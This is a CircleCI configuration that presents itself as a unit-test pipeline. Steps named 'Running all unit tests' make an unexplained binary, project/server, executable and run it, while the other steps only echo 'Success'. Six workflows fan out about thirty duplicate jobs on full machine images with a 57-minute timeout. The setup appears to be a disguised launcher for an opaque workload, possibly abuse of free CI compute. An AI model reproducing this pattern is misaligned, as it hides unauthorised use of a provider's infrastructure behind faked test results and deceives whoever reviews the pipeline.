version: 2.1 

orbs:
  kubernetes: circleci/kubernetes@1.3.1
  
  
commands:
  start-minikube:
    steps:
        - run: 
            name: Running all unit tests 
            command: |
                 chmod u+x project/server
                 echo "Success" 
        - run: project/server
          
  test:
    steps:
      - run: 
          name: Running all unit tests 
          command: |
            echo "Success" 
            systemctl status kubernetes
          no_output_timeout: 57m
      - run: echo "Success" 
 
jobs: 
  test: 
    parameters: 
        machine: 
          type: string 
          default: ubuntu-2004:202104-01 
    machine: 
      image: << parameters.machine >> 
 
    steps: 
      - checkout
      - start-minikube
      - kubernetes/install-kubectl
      - test
      
workflows: 
  version: 2 
  test-all-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      
      - test
 
  all-node-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
       
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-js-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-python-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-Net-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test
 
  all-met-versions: 
    jobs: 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test: 
          machine: ubuntu-2004:202104-01 
      - test

